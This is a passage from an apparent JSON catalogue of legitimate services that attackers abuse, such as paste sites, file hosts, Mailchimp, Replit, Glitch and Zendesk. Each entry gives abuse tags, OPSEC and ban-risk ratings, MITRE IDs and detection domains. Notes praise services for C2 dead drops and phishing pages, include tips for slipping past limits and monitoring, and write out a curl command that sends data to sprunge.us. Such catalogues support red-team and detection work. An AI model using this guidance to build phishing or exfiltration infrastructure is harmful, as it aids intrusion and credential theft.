    "name": "ZeroBin / PrivateBin",
    "url": "https://zerobin.net",
    "category": "Paste",
    "provider": "ZeroBin",
    "signup": "none",
    "signupTime": "0",
    "domains": [
      "zerobin.net",
      "privatebin.net"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 0,
      "c2": 1,
      "exfil": 1,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "E2E encrypted paste. Server cannot read content. Self-hostable. Better OPSEC than Pastebin",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "E2E encrypted - host cannot read content. Self-hostable for full control",
    "verification": "No signup required",
    "trust": "low",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": false,
      "trialDays": null,
      "limits": "Free. No account. E2E encrypted. Self-hostable. Configurable expiry"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": false,
      "mfa": false,
      "notes": "No auth. Encryption key in URL fragment (never sent to server)"
    },
    "knownC2": [],
    "exfilTools": [
      {
        "name": "text dump services",
        "url": "https://lolexfil.github.io/#tool=Pastebin%20/%20text%20dump%20services",
        "note": ""
      }
    ],
    "mitre": [
      "T1102.002",
      "T1105",
      "T1573.002"
    ],
    "refs": [
      {
        "title": "PrivateBin",
        "url": "https://privatebin.info/"
      }
    ],
    "detection": [
      "zerobin.net",
      "privatebin.net"
    ],
    "notes": "E2E encrypted paste - server CANNOT read content. Encryption key is in URL fragment (never sent to server). Self-hostable for ultimate OPSEC. Superior to Pastebin for C2 dead drops",
    "customDomain": true,
    "customDomainNotes": "Custom domains on self-hosted",
    "dataRetention": "Configurable expiry. E2E encrypted",
    "rateLimits": "No rate limit",
    "maxFileSize": "N/A",
    "logging": "Server CANNOT read content (E2E). No logging possible"
  },
  {
    "name": "Sprunge",
    "url": "https://sprunge.us",
    "category": "Paste",
    "provider": "Sprunge",
    "signup": "none",
    "signupTime": "0",
    "domains": [
      "sprunge.us"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 0,
      "c2": 1,
      "exfil": 1,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "CLI paste via curl POST. Minimal fingerprint. Like Termbin alternative",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "No enforcement",
    "verification": "No signup required",
    "trust": "low",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": false,
      "trialDays": null,
      "limits": "Free. No account. curl -F 'sprunge=<-' http://sprunge.us"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": false,
      "mfa": false,
      "notes": "No auth"
    },
    "knownC2": [],
    "exfilTools": [
      {
        "name": "text dump services",
        "url": "https://lolexfil.github.io/#tool=Pastebin%20/%20text%20dump%20services",
        "note": ""
      }
    ],
    "mitre": [
      "T1102.002",
      "T1105"
    ],
    "refs": [
      {
        "title": "Sprunge",
        "url": "http://sprunge.us"
      }
    ],
    "detection": [
      "sprunge.us"
    ],
    "notes": "CLI paste via curl. echo data | curl -F 'sprunge=<-' http://sprunge.us. Alternative to Termbin. Minimal network fingerprint",
    "customDomain": false,
    "customDomainNotes": "N/A - paste service",
    "dataRetention": "Permanent",
    "rateLimits": "No rate limit",
    "maxFileSize": "N/A",
    "logging": "No logging"
  },
  {
    "name": "Mediafire",
    "url": "https://mediafire.com",
    "category": "Storage",
    "provider": "Mediafire",
    "signup": "email",
    "signupTime": "~2min",
    "domains": [
      "mediafire.com",
      "download.mediafire.com"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 1,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "10GB free storage. Direct download links. Less scrutinized than major cloud storage",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Minimal content scanning. Files persist",
    "verification": "Email only. No CC for free",
    "trust": "low",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": false,
      "trialDays": null,
      "limits": "Free: 10GB storage, 4GB max file size, direct download links, no bandwidth limit"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": false,
      "mfa": false,
      "notes": "Email/password auth only"
    },
    "knownC2": [],
    "exfilTools": [
      {
        "name": "MediaFire CLI",
        "url": "https://lolexfil.github.io/#tool=MediaFire",
        "note": ""
      }
    ],
    "mitre": [
      "T1567.002",
      "T1105"
    ],
    "refs": [
      {
        "title": "Mediafire",
        "url": "https://www.mediafire.com/"
      }
    ],
    "detection": [
      "mediafire.com",
      "download.mediafire.com"
    ],
    "notes": "10GB free. 4GB max file size. Direct download links for payload delivery. Less scrutinized than Dropbox/GDrive. No content DLP scanning",
    "customDomain": false,
    "customDomainNotes": "N/A - file hosting",
    "dataRetention": "Permanent (10GB free)",
    "rateLimits": "No public API limits",
    "maxFileSize": "4GB per file",
    "logging": "No audit logs"
  },
  {
    "name": "Adobe Express",
    "url": "https://express.adobe.com",
    "category": "Phishing",
    "provider": "Adobe",
    "signup": "email",
    "signupTime": "~3min",
    "domains": [
      "express.adobe.com",
      "spark.adobe.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 0,
      "payload": 0,
      "creds": 1
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "Trusted Adobe domain. Create shareable web pages, social posts, and flyers for phishing",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Adobe trusted platform. Shared pages rarely flagged",
    "verification": "Adobe account (email). Google/Apple SSO. No CC for free",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": false,
      "trialDays": null,
      "limits": "Free: basic templates, 2GB storage, Adobe fonts, shareable web pages on express.adobe.com"
    },
    "sso": {
      "saml": true,
      "oidc": true,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "Adobe SSO via enterprise. Google/Apple login on free"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1566.002",
      "T1204.001"
    ],
    "refs": [
      {
        "title": "Adobe Express",
        "url": "https://www.adobe.com/express/"
      }
    ],
    "detection": [
      "*.express.adobe.com",
      "new.express.adobe.com",
      "express.adobe.com/page/*",
      "express.adobe.com/post/*",
      "Adobe Express pages impersonating documents for phishing",
      "Cofense: Adobe 17%+ of all online document hosting abused in 2024 credential phishing"
    ],
    "notes": "Shareable web pages on trusted express.adobe.com domain. Create professional phishing materials. Adobe-owned = universally trusted by email filters and proxies",
    "customDomain": false,
    "customDomainNotes": "N/A - design platform",
    "dataRetention": "Permanent (2GB storage free)",
    "rateLimits": "No public API",
    "maxFileSize": "N/A",
    "logging": "No audit logs for free tier"
  },
  {
    "name": "Gitee",
    "url": "https://gitee.com",
    "category": "DevOps",
    "provider": "Gitee",
    "signup": "email",
    "signupTime": "~3min",
    "domains": [
      "gitee.com"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 0,
      "c2": 1,
      "exfil": 0,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [
      "gitee.com/api/v5/*"
    ],
    "opsec": "low",
    "opsecNotes": "Chinese GitHub alternative. C2 hosting with minimal Western SOC visibility. API compatible with GitHub",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Chinese platform. Western abuse reports unlikely to be actioned",
    "verification": "Email or phone. Chinese phone for some features",
    "trust": "low",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free: 5GB total storage, public/private repos, Pages hosting, API access"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": true,
      "notes": "OAuth for API. WeChat/DingTalk SSO"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1102.002",
      "T1105"
    ],
    "refs": [
      {
        "title": "Gitee",
        "url": "https://gitee.com"
      }
    ],
    "detection": [
      "gitee.com"
    ],
    "notes": "Chinese GitHub alternative. Repos for payload staging and C2 dead drops. Minimal Western SOC coverage. GitHub-compatible API. Useful when GitHub is being monitored",
    "customDomain": true,
    "customDomainNotes": "Custom domains on Gitee Pages",
    "dataRetention": "Permanent (5GB total)",
    "rateLimits": "API: rate limited",
    "maxFileSize": "100MB per file",
    "logging": "No public audit logs"
  },
  {
    "name": "Rebrandly",
    "url": "https://rebrand.ly",
    "category": "Redirector",
    "provider": "Rebrandly",
    "signup": "email",
    "signupTime": "~2min",
    "domains": [
      "rebrand.ly",
      "rb.gy"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 0,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [
      "api.rebrandly.com/*"
    ],
    "opsec": "low",
    "opsecNotes": "Custom branded short links with your own domain. Multiple link domains (rebrand.ly, rb.gy). API for automation",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Less flagged than Bitly. Custom domains hide the shortener",
    "verification": "Email only. No CC for free",
    "trust": "low",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free: 25 links, 5k clicks/mo, rebrand.ly or rb.gy domains. API available"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": true,
      "notes": "OAuth for API"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1566.002",
      "T1204.001"
    ],
    "refs": [
      {
        "title": "Rebrandly Pricing",
        "url": "https://www.rebrandly.com/pricing"
      }
    ],
    "detection": [
      "rebrand.ly",
      "rebrand.ly/*",
      "api.rebrandly.com",
      "*.rebrandly.com",
      "Branded short links masking phishing/malware destinations",
      "Custom branded domains on Rebrandly for high-trust phishing redirects"
    ],
    "notes": "Custom branded short links. Less flagged than Bitly/TinyURL. Multiple domains (rebrand.ly, rb.gy). Custom domain support hides the shortener entirely. API for automated link creation",
    "customDomain": true,
    "customDomainNotes": "Custom branded domains ($13/mo+)",
    "dataRetention": "Permanent (links)",
    "rateLimits": "API: rate limited",
    "maxFileSize": "N/A",
    "logging": "Click analytics"
  },
  {
    "name": "Telegra.ph",
    "url": "https://telegra.ph",
    "category": "Phishing",
    "provider": "Telegram",
    "signup": "none",
    "signupTime": "0",
    "domains": [
      "telegra.ph"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 0,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [
      "api.telegra.ph/*"
    ],
    "opsec": "low",
    "opsecNotes": "Telegram's publishing platform. No signup. Anonymous publishing. Trusted domain. API for automation",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Minimal content moderation. Anonymous posts. Telegram-owned",
    "verification": "No signup required. Anonymous publishing. API available without auth",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": false,
      "trialDays": null,
      "limits": "Free. No account. Anonymous. API for automated publishing. Image hosting included"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": false,
      "mfa": false,
      "notes": "No auth required"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1566.002",
      "T1583.006"
    ],
    "refs": [
      {
        "title": "Telegraph API",
        "url": "https://telegra.ph/api"
      }
    ],
    "detection": [
      "telegra.ph"
    ],
    "notes": "Telegram's anonymous publishing platform. Zero signup. API for automated page creation. Image hosting included. Trusted domain. Pages look professional and legitimate",
    "customDomain": false,
    "customDomainNotes": "N/A - publishing platform",
    "dataRetention": "Permanent",
    "rateLimits": "API: rate limited",
    "maxFileSize": "5MB per image upload",
    "logging": "No logging. Anonymous publishing"
  },
  {
    "name": "DocSend",
    "url": "https://docsend.com",
    "category": "Phishing",
    "provider": "Dropbox",
    "signup": "email",
    "signupTime": "~3min",
    "domains": [
      "docsend.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 0,
      "payload": 0,
      "creds": 1
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "Document sharing with email capture and view tracking. Trusted Dropbox-owned domain. Popular for BEC pretexts",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Document sharing is normal business activity. Dropbox-owned",
    "verification": "Email only. Free trial 14 days. No CC initially",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "trial",
      "devAccount": false,
      "trialDays": 14,
      "limits": "Trial: unlimited links, email capture, analytics, NDA signing. Personal plan $10/mo after"
    },
    "sso": {
      "saml": true,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": true,
      "notes": "SAML on Standard+. Dropbox SSO"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1566.002",
      "T1598.003"
    ],
    "refs": [
      {
        "title": "DocSend Pricing",
        "url": "https://www.docsend.com/pricing/"
      }
    ],
    "detection": [
      "docsend.com",
      "*.docsend.com",
      "docsend.com/view/*",
      "api.docsend.com",
      "DocSend viewer analytics: tracks who viewed, when, how long per page",
      "DocSend links as phishing pretexts ('view this proposal/contract')",
      "Cofense: DocuSign-like platforms with link expiration hinder post-attack forensics"
    ],
    "notes": "Document sharing with built-in email capture and view tracking. Require email to view = credential harvesting. Analytics show who opened when. Dropbox-owned trusted domain. Excellent for BEC pretexts",
    "customDomain": false,
    "customDomainNotes": "N/A - document sharing",
    "dataRetention": "Permanent (trial: 14 days)",
    "rateLimits": "No public API",
    "maxFileSize": "250MB per document",
    "logging": "Viewer analytics: email, time spent, page-by-page"
  },
  {
    "name": "Linode Object Storage",
    "url": "https://www.linode.com/products/object-storage/",
    "category": "Storage",
    "provider": "Akamai/Linode",
    "signup": "email+cc",
    "signupTime": "~5min",
    "domains": [
      "*.linodeobjects.com"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 1,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "S3-compatible object storage. Akamai-owned. Less monitored than AWS S3",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Akamai/Linode abuse team exists but less aggressive than AWS",
    "verification": "Email + CC required",
    "trust": "low",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "trial",
      "devAccount": true,
      "trialDays": 60,
      "limits": "$100 credit 60 days. Object Storage $5/mo for 250GB. S3-compatible API"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": true,
      "notes": "OAuth for API. No enterprise SSO on free"
    },
    "knownC2": [],
    "exfilTools": [
      {
        "name": "rclone",
        "url": "https://lolexfil.github.io/#tool=rclone",
        "note": ""
      },
      {
        "name": "Cyberduck",
        "url": "https://lolexfil.github.io/#tool=Cyberduck",
        "note": ""
      },
      {
        "name": "s5cmd",
        "url": "https://lolexfil.github.io/#tool=s5cmd",
        "note": ""
      }
    ],
    "mitre": [
      "T1567.002",
      "T1105"
    ],
    "refs": [
      {
        "title": "Linode Pricing",
        "url": "https://www.linode.com/pricing/"
      },
      {
        "title": "lolexfil",
        "url": "https://lolexfil.github.io"
      }
    ],
    "detection": [
      "*.linodeobjects.com"
    ],
    "notes": "S3-compatible object storage. Akamai-owned. $100 credit trial. Less monitored than AWS S3. rclone exfil target",
    "customDomain": true,
    "customDomainNotes": "Custom domains via CNAME",
    "dataRetention": "Permanent (S3-compatible)",
    "rateLimits": "S3 API rate limits",
    "maxFileSize": "5GB per object",
    "logging": "Access logs available"
  },
  {
    "name": "Mailchimp",
    "url": "https://mailchimp.com",
    "category": "Email",
    "provider": "Intuit",
    "signup": "email",
    "signupTime": "~3min",
    "domains": [
      "mailchimp.com",
      "*.list-manage.com",
      "*.campaign-archive.com",
      "*.mailchimpsites.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 0,
      "payload": 0,
      "creds": 1
    },
    "apiEndpoints": [
      "*.api.mailchimp.com/3.0/*"
    ],
    "opsec": "low",
    "opsecNotes": "Free email marketing with templates, tracking, analytics, and custom sending domains. Complete phishing infrastructure",
    "socDetection": "unlikely",
    "banRisk": "medium",
    "banNotes": "Mailchimp monitors sender reputation and content. Accounts suspended for phishing. Abuse reports processed",
    "verification": "Email only. No CC for free tier. Phone optional",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free: 500 contacts, 1000 emails/mo (500/day), 1 audience, email templates, basic analytics, custom sending domain"
    },
    "sso": {
      "saml": true,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": true,
      "notes": "SAML on Premium. OAuth for API. Intuit SSO"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1566.001",
      "T1585.002",
      "T1598.003"
    ],
    "refs": [
      {
        "title": "Mailchimp Pricing",
        "url": "https://mailchimp.com/pricing/marketing/"
      },
      {
        "title": "Mailchimp API",
        "url": "https://mailchimp.com/developer/"
      }
    ],
    "detection": [
      "*.list-manage.com",
      "*.campaign-archive.com"
    ],
    "notes": "Complete phishing infrastructure: 500 contacts, email templates, open/click tracking, A/B testing, landing pages on *.mailchimpsites.com. Custom sending domain for sender reputation. Trusted Intuit-owned platform. Delete and re-add contacts to bypass 500 limit",
    "customDomain": true,
    "customDomainNotes": "Custom sending domains (DNS verification)",
    "dataRetention": "Permanent (contacts). Reports: varies",
    "rateLimits": "API: 10 concurrent calls",
    "maxFileSize": "25MB per campaign email",
    "logging": "Reports: opens, clicks, bounces. Audit log on Premium"
  },
  {
    "name": "Replit",
    "url": "https://replit.com",
    "category": "Cloud",
    "provider": "Replit",
    "signup": "email",
    "signupTime": "~1min",
    "domains": [
      "*.repl.co",
      "*.replit.dev",
      "replit.com"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 1,
      "exfil": 1,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "Full Linux containers with hosting. Free code execution, database, secrets store. *.repl.co for web services",
    "socDetection": "moderate",
    "banRisk": "medium",
    "banNotes": "Replit moderates content. Repls removed on abuse report. Free tier restricted in 2024+",
    "verification": "Email or Google/GitHub OAuth. No CC for free tier",
    "trust": "low",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free: limited compute, *.repl.co hosting, PostgreSQL/SQLite, secrets manager, 10GB storage. Always-on requires paid"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": true,
      "notes": "Google/GitHub/Apple OAuth. No enterprise SSO"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1583.006",
      "T1102",
      "T1567.002",
      "T1105"
    ],
    "refs": [
      {
        "title": "Replit Pricing",
        "url": "https://replit.com/pricing"
      }
    ],
    "detection": [
      "*.repl.co",
      "*.replit.dev"
    ],
    "notes": "Full Linux container hosting with free tier. Complete C2 backend: web server, database, secrets store, cron jobs. *.repl.co domains for phishing or C2 endpoints. Code execution in 50+ languages. LOTS lists all 4 abuse tags",
    "customDomain": true,
    "customDomainNotes": "Custom domains on paid plan. Free: *.repl.co",
    "dataRetention": "Persistent (10GB storage free)",
    "rateLimits": "No explicit API rate limit",
    "maxFileSize": "No per-file limit stated",
    "logging": "No audit logs"
  },
  {
    "name": "Glitch",
    "url": "https://glitch.com",
    "category": "Cloud",
    "provider": "Fastly",
    "signup": "email",
    "signupTime": "~1min",
    "domains": [
      "*.glitch.me"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 1,
      "exfil": 0,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "Free Node.js hosting on *.glitch.me. Instant deploy. Live editing. No build step needed",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Minimal abuse enforcement. Projects sleep after 5min inactivity on free tier",
    "verification": "Email or GitHub/Google/Facebook OAuth. No CC",
    "trust": "low",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free: 1000 project hours/mo, 200MB disk, 512MB RAM, *.glitch.me hosting. Sleeps after 5min idle"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": false,
      "notes": "GitHub/Google/Facebook OAuth"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1583.006",
      "T1102",
      "T1105"
    ],
    "refs": [
      {
        "title": "Glitch Pricing",
        "url": "https://glitch.com/pricing"
      }
    ],
    "detection": [
      "*.glitch.me"
    ],
    "notes": "Instant Node.js hosting on *.glitch.me. No build step - edit and deploy instantly. Perfect for disposable redirectors and phishing pages. Fastly-owned. Projects sleep after 5min idle on free tier - use pinging service to keep alive",
    "customDomain": true,
    "customDomainNotes": "Custom domains on paid plan. Free: *.glitch.me",
    "dataRetention": "Persistent (200MB disk)",
    "rateLimits": "1000 project hours/mo",
    "maxFileSize": "200MB total disk",
    "logging": "No audit logs"
  },
  {
    "name": "CodeSandbox",
    "url": "https://codesandbox.io",
    "category": "Cloud",
    "provider": "CodeSandbox",
    "signup": "email",
    "signupTime": "~1min",
    "domains": [
      "*.csb.app",
      "*.codesandbox.io"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 0,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "Browser IDE with instant preview URLs on *.csb.app. Sandboxed hosting for frontend phishing pages",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Minimal content moderation. Developer platform",
    "verification": "Email or GitHub/Google OAuth. No CC for free",
    "trust": "low",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free: 20 sandboxes, *.csb.app preview URLs, 2GB RAM per sandbox, public projects"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": false,
      "notes": "GitHub/Google OAuth"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1583.006",
      "T1566.002"
    ],
    "refs": [
      {
        "title": "CodeSandbox Pricing",
        "url": "https://codesandbox.io/pricing"
      }
    ],
    "detection": [
      "*.csb.app",
      "*.codesandbox.io"
    ],
    "notes": "Browser IDE with instant *.csb.app preview URLs for phishing pages. React/Vue/Angular templates for professional-looking credential pages. Developer trusted domain. Minimal moderation",
    "customDomain": false,
    "customDomainNotes": "N/A. Free: *.csb.app",
    "dataRetention": "Persistent (20 sandboxes free)",
    "rateLimits": "No explicit rate limit",
    "maxFileSize": "N/A",
    "logging": "No audit logs"
  },
  {
    "name": "Zendesk",
    "url": "https://www.zendesk.com",
    "category": "Business App",
    "provider": "Zendesk (acquired by private equity 2022)",
    "signup": "email",
    "signupTime": "~3min",
    "domains": [
      "zendesk.com",
      "*.zendesk.com",
      "zdassets.com",
      "zopim.com",
      "zendesk.co.jp"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 1,
      "payload": 1,
      "creds": 1
    },
    "apiEndpoints": [
      "*.zendesk.com/api/v2/tickets",
      "*.zendesk.com/api/v2/users",
      "*.zendesk.com/api/v2/attachments",
      "*.zendesk.com/api/v2/requests",
      "*.zendesk.com/hc/*"
    ],
    "opsec": "low",
    "opsecNotes": "*.zendesk.com subdomains are ubiquitous in enterprise environments. Support ticket emails come FROM the customer's own domain, not Zendesk, complicating filtering. Anonymous ticket submission enabled by default. Help center pages indexable. However, any mature SOC that maintains a Zendesk tenant allowlist will immediately flag traffic to unknown tenants. Trial accounts get full Professional features for 14 days with no CC",
    "socDetection": "likely",
    "banRisk": "low",
    "banNotes": "Zendesk allows unverified users to submit tickets by default. Mass email bombing via ticket creation hit Discord, Tinder, Dropbox, NordVPN, Riot Games and others (BleepingComputer Jan 2026). Platform response to abuse has been slow",
    "verification": "Email verification for trial account",
    "trust": "high",
    "lastVerified": "2026-03",
    "customDomain": true,
    "customDomainNotes": "Custom subdomains on all plans (yourcompany.zendesk.com). Custom host mapping to your own domain on paid plans",
    "dataRetention": "Permanent (trial data persists after expiry). Tickets, attachments, help center articles persist indefinitely on paid plans",
    "rateLimits": "Support/HC API: 200 req/min (Team), 400 req/min (Growth/Professional), 700 req/min (Enterprise), 2500 req/min (Enterprise Plus). Chat API: 200 req/min all plans. Per-account enforcement. Retry-After header on 429",
    "maxFileSize": "50MB per attachment on tickets. 20MB on help center articles",
    "logging": "Audit log on Enterprise plan. Admin activity log. API usage tracking via response headers (X-RateLimit-*). Access logs on Enterprise with Advanced Data Privacy add-on. FedRAMP SCG available",
    "freeTier": {
      "type": "trial",
      "devAccount": true,
      "trialDays": 14,
      "limits": "14-day trial with Suite Professional features. No CC required. Up to 5 agents. Startup program: 6 months free (<50 employees, up to Series B). Developer partner: sponsored account available"
    },
    "sso": {
      "saml": true,
      "oidc": true,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "SAML, OIDC, JWT SSO supported. Multiple SSO configs for different user groups. Social SSO (Google, Microsoft, Facebook, Twitter). SCIM provisioning on Enterprise. MFA enforced on all plans. FedRAMP authorized"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1566.002",
      "T1585.002",
      "T1498",
      "T1078.004",
      "T1199"
    ],
    "refs": [
      {
        "title": "Zendesk Pricing",
        "url": "https://www.zendesk.com/pricing/"
      },
      {
        "title": "Zendesk Developer: Trial and Sponsored Accounts",
        "url": "https://developer.zendesk.com/documentation/api-basics/getting-started/getting-a-trial-or-sponsored-account-for-development/"
      },
      {
        "title": "Zendesk: SSO Options (SAML, OIDC, JWT)",
        "url": "https://support.zendesk.com/hc/en-us/articles/4408883587226-Single-sign-on-SSO-options-in-Zendesk"
      },
      {
        "title": "Zendesk Developer: API Rate Limits",
        "url": "https://developer.zendesk.com/api-reference/introduction/rate-limits/"
      },
      {
        "title": "ReliaQuest: Scattered Lapsus$ Hunters Target Zendesk (40+ Typosquatted Domains, Fake SSO Portals)",
        "url": "https://reliaquest.com/blog/zendesk-scattered-lapsus-hunters-latest-target/"
      },
      {
        "title": "Infosecurity Magazine: Scattered Lapsus$ Hunters Take Aim at Zendesk Users",
        "url": "https://www.infosecurity-magazine.com/news/scattered-lapsus-hunters-zendesk/"
      },
      {
        "title": "Cybersecurity Dive: Hackers Ready Threat Campaign Aimed at Zendesk Environments",
        "url": "https://www.cybersecuritydive.com/news/hackers-threat-campaign-zendesk-environments/806666/"
      },
      {
        "title": "BleepingComputer: Zendesk Ticket Systems Hijacked in Massive Global Spam Wave",
        "url": "https://www.bleepingcomputer.com/news/security/zendesk-ticket-systems-hijacked-in-massive-global-spam-wave/"
      },
      {
        "title": "Rescana: Zendesk Email Bomb Attacks - Exploiting Lax Authentication and Anonymous Ticket Creation",
        "url": "https://www.rescana.com/post/zendesk-email-bomb-attacks-exploiting-lax-authentication-and-anonymous-ticket-creation"
      },
      {
        "title": "WithSecure: Attackers Exploit Zendesk Trusted Infrastructure to Distribute Signed RMM Tools",
        "url": "https://acumencyber.com/cyber-threat-intelligence-digest-august-2025-week-31"
      },
      {
        "title": "CSO Online: Scattered Lapsus$ Hunters Target Zendesk Users with Fake Domains",
        "url": "https://www.csoonline.com/article/4097846/scattered-lapsus-hunters-target-zendesk-users-with-fake-domains.html"
      },
      {
        "title": "Zendesk FedRAMP Secure Configuration Guide",
        "url": "https://support.zendesk.com/hc/en-us/articles/5004813573658-FedRAMP-Secure-Configuration-Guide-SCG"
      },
      {
        "title": "BleepingComputer: Discord Breach Exposed Data of 5.5M Users (Zendesk Instance via Compromised BPO Agent)",
        "url": "https://www.bleepingcomputer.com/news/security/hackers-claim-discord-breach-exposed-data-of-55-million-users/"
      },
      {
        "title": "Malwarebytes: Discord Warns Users After Third-Party Zendesk Breach",
        "url": "https://www.malwarebytes.com/blog/news/2025/10/discord-warns-users-after-data-stolen-in-third-party-breach"
      },
      {
        "title": "ReliaQuest: ShinyHunters Fires Up Another Zendesk Campaign - 60+ Impersonation Domains (March 2026)",
        "url": "https://reliaquest.com/blog/zendesk-scattered-lapsus-hunters-latest-target/"
      }
    ],
    "detection": [
      "DOMAIN: *.zendesk.com/api/v2/* (API traffic to non-company Zendesk tenants)",
      "DOMAIN: *.zendesk.com/hc/* (help center pages - can host arbitrary content)",
      "DOMAIN: *.zendesk.com/requests/new (anonymous ticket submission endpoint)",
      "DOMAIN: zdassets.com, zopim.com (Zendesk CDN and chat widget domains)",
      "ALLOWLIST LOGIC: maintain a list of known/approved Zendesk tenant subdomains for your org - alert on connections to ANY other *.zendesk.com tenant",
